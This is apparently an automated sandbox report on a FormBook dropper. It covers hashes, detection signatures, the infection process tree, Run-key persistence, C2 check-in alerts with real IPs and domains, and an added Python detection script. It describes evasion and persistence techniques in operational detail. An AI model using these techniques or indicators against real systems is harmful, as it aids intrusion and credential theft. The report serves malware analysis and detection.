
Windows Analysis Report
u549ed5dEA.exe

Overview

General Information

Sample name: u549ed5dEA.exe (renamed because the original name is a hash value)
Original sample name: f3c0f469753fe8f40c2f45cee815d8afb9fa2b54f2b6a32a14bf3dd1db56f3b7.exe
Analysis ID: 1586017
MD5: 9c520c748bec9e504a1911bb4d975732
SHA1: 1931d33ef9ea91279c3ad469e97c04e1e8cbd93a
SHA256: f3c0f469753fe8f40c2f45cee815d8afb9fa2b54f2b6a32a14bf3dd1db56f3b7
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • u549ed5dEA.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\u549ed5dEA.exe" MD5: 9C520C748BEC9E504A1911BB4D975732)
    • wscript.exe (PID: 3128 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5808 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 6304 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 6196 cmdline: "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • avqj.mp2 (PID: 2828 cmdline: avqj.mp2 awggmrd.xls MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 4796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 4324 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 5276 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • avqj.mp2.exe (PID: 6848 cmdline: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 6496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • avqj.mp2.exe (PID: 4676 cmdline: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 5020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • avqj.mp2.exe (PID: 3836 cmdline: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls MD5: 0ADB9B817F1DF7807576C2D7068DD931)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Process Memory Space: avqj.mp2 PID: 2828 | JoeSecurity_AntiVM_1 | Yara detected AntiVM autoit script | Joe Security |
Process Memory Space: avqj.mp2 PID: 2828 | JoeSecurity_AutoitInjector | Yara detected Autoit Injector | Joe Security |

Source | Rule | Description | Author | Strings
14.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
14.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3128, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 5808, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\u549ed5dEA.exe", ParentImage: C:\Users\user\Desktop\u549ed5dEA.exe, ParentProcessId: 3148, ParentProcessName: u549ed5dEA.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ProcessId: 3128, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\u549ed5dEA.exe", ParentImage: C:\Users\user\Desktop\u549ed5dEA.exe, ParentProcessId: 3148, ParentProcessName: u549ed5dEA.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ProcessId: 3128, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\u549ed5dEA.exe", ParentImage: C:\Users\user\Desktop\u549ed5dEA.exe, ParentProcessId: 3148, ParentProcessName: u549ed5dEA.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ProcessId: 3128, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls, EventID: 13, EventType: SetValue, Image: C:\Users\user\ruum\avqj.mp2.exe, ProcessId: 6848, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: avqj.mp2 awggmrd.xls, CommandLine: avqj.mp2 awggmrd.xls, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6196, ParentProcessName: cmd.exe, ProcessCommandLine: avqj.mp2 awggmrd.xls, ProcessId: 2828, ProcessName: avqj.mp2
Source: Process started; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls, CommandLine: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls, CommandLine|base64offset|contains: , Image: C:\Users\user\ruum\avqj.mp2.exe, NewProcessName: C:\Users\user\ruum\avqj.mp2.exe, OriginalFileName: C:\Users\user\ruum\avqj.mp2.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls, ProcessId: 6848, ProcessName: avqj.mp2.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\u549ed5dEA.exe", ParentImage: C:\Users\user\Desktop\u549ed5dEA.exe, ParentProcessId: 3148, ParentProcessName: u549ed5dEA.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ProcessId: 3128, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, ProcessId: 2828, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
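The Sigma matches above share a small set of observable traits: a script host loading a .vbe from a RarSFX temp folder, that host spawning cmd.exe, a PE executed under a non-executable extension (avqj.mp2), an 8.3 short name (AVQJMP~1.EXE) in a command line and in the Run value, and ipconfig /release around the injection. The following is an added example, not Joe Sandbox code and not any published Sigma rule: it re-implements those checks as plain Python over constructed process-creation and registry events whose field names follow the Data: fields above and whose values are copied from this report's process tree. The rule names, the directory and extension lists and the benign control events are this example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample events (not Joe Sandbox output). Values copied from the
# report's process tree, plus one benign control event in each list.
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe"',
     "ParentImage": r"C:\Users\user\Desktop\u549ed5dEA.exe"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c ipconfig /release',
     "ParentImage": r"C:\Windows\SysWOW64\wscript.exe"},
    {"Image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2",
     "CommandLine": "avqj.mp2 awggmrd.xls",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    {"Image": r"C:\Users\user\ruum\avqj.mp2.exe",
     "CommandLine": r'"C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls',
     "ParentImage": ""},
    {"Image": r"C:\Windows\System32\notepad.exe",  # benign control
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\user\Documents\notes.txt',
     "ParentImage": r"C:\Windows\explorer.exe"},
]
REGISTRY_EVENTS = [
    {"EventID": 13, "EventType": "SetValue",
     "Image": r"C:\Users\user\ruum\avqj.mp2.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate",
     "Details": r"C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls"},
    {"EventID": 13, "EventType": "SetValue",  # benign control
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

# Assumed lists for this example; tune them to your estate before deploying.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbe", ".vbs", ".js", ".jse", ".wsf", ".wsh")
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\", "\\programdata\\")
NORMAL_EXE_EXTS = {".exe", ".com", ".scr", ".tmp", ".bin"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe"}
AUTORUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
# 8.3 short name: 1-6 chars, '~', digits, optional 1-3 char extension, bounded by '\', space, quote or end.
SHORT_NAME_RE = re.compile(r'(?:^|[\\\s"])([^\\\s".]{1,6}~\d+(?:\.[^\\\s".]{1,3})?)(?=[\\\s"]|$)')
IPCONFIG_RE = re.compile(r"\bipconfig\b.*\s/(release|renew)\b", re.I)

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def _args(cmd):  # split a Windows command line into tokens, honouring double quotes
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmd)]

def check_process(ev):
    """Return the rule names a process-creation event triggers."""
    hits = []
    name, parent = _basename(ev["Image"]), _basename(ev.get("ParentImage", ""))
    cmd = ev["CommandLine"]
    args = [a.lower() for a in _args(cmd)[1:]]
    ext = name[name.rfind("."):] if "." in name else ""
    # Script host loading a script from a temp/public folder (itdo.vbe under RarSFX0)
    if name in SCRIPT_HOSTS and any(
            a.endswith(SCRIPT_EXTS) and any(d in a for d in SUSPICIOUS_DIRS) for a in args):
        hits.append("script_interpreter_from_suspicious_folder")
    # Script host spawning a shell (wscript.exe -> cmd.exe /c ...)
    if parent in SCRIPT_HOSTS and name in SHELLS:
        hits.append("script_host_spawned_shell")
    # PE executed under a non-executable extension (avqj.mp2 is the AutoIt interpreter)
    if ext not in NORMAL_EXE_EXTS:
        hits.append("suspicious_file_type_extension")
    # 8.3 short name in the command line (AVQJMP~1.EXE hides the odd extension)
    if SHORT_NAME_RE.search(cmd):
        hits.append("ntfs_short_name_in_command_line")
    # DHCP lease dropped or renewed from a shell
    if IPCONFIG_RE.search(cmd):
        hits.append("ipconfig_release_or_renew")
    return hits

def check_registry(ev):
    """Return the rule names a registry SetValue event triggers."""
    hits = []
    if ev.get("EventID") == 13 and AUTORUN_KEY_RE.search(ev["TargetObject"]):
        hits.append("currentversion_autorun_key_modification")
        if SHORT_NAME_RE.search(ev.get("Details", "")):
            hits.append("autorun_value_uses_ntfs_short_name")
    return hits

def scan(process_events, registry_events):
    """Map every triggered rule to the images that triggered it."""
    findings = defaultdict(list)
    for events, check in ((process_events, check_process), (registry_events, check_registry)):
        for ev in events:
            for rule in check(ev):
                findings[rule].append(ev["Image"])
    return dict(findings)

if __name__ == "__main__":
    for rule, images in sorted(scan(PROCESS_EVENTS, REGISTRY_EVENTS).items()):
        print(rule, *images, sep="\n    ")
```

Run stand-alone it lists seven rule hits across the four malicious events and none for the two control events. The short-name check is deliberately anchored to a path separator, whitespace or quote so that ordinary names containing a tilde mid-token are not flagged; in a real pipeline the same regex should also be run over the Run value (Details), as the registry check does, because a short name there is how AVQJMP~1.EXE survives a casual look at the autorun entry.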
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:21:22.629497+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49977 | 188.114.96.3 | 80 | TCP
2025-01-08T16:21:39.804507+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49978 | 206.238.89.119 | 80 | TCP
2025-01-08T16:21:42.398283+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49979 | 206.238.89.119 | 80 | TCP


                AV Detection

Source: u549ed5dEA.exe; ReversingLabs: Detection: 60%
Source: Yara match; File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: u549ed5dEA.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: u549ed5dEA.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: u549ed5dEA.exe
Source: Binary string: UserAccountControlSettings.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.3279041422.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UserAccountControlSettings.pdb source: RegSvcs.exe, 0000000E.00000002.3279041422.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.3279217557.00000000013F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.3279217557.00000000013F0000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\u549ed5dEA.exe; Code function: 0_2_00C9F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C9F826
Source: C:\Users\user\Desktop\u549ed5dEA.exe; Code function: 0_2_00CB1630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00CB1630
Source: C:\Users\user\Desktop\u549ed5dEA.exe; Code function: 0_2_00CC1FF8 FindFirstFileExA,0_2_00CC1FF8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EEE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_00EEE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EED836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00EED836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EEDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00EEDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EF9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00EF9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EFA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00EFA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EFA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_00EFA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EF65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_00EF65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EBC642 FindFirstFileExW,8_2_00EBC642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EF72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_00EF72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EF7248 FindFirstFileW,FindClose,8_2_00EF7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EF7247 FindFirstFileW,8_2_00EF7247

                Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49977 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 206.238.89.119:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 206.238.89.119:80
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EFD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,8_2_00EFD7A1
Source: global traffic; DNS traffic detected: DNS query: www.supernutra01.online
Source: global traffic; DNS traffic detected: DNS query: www.127358.win
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
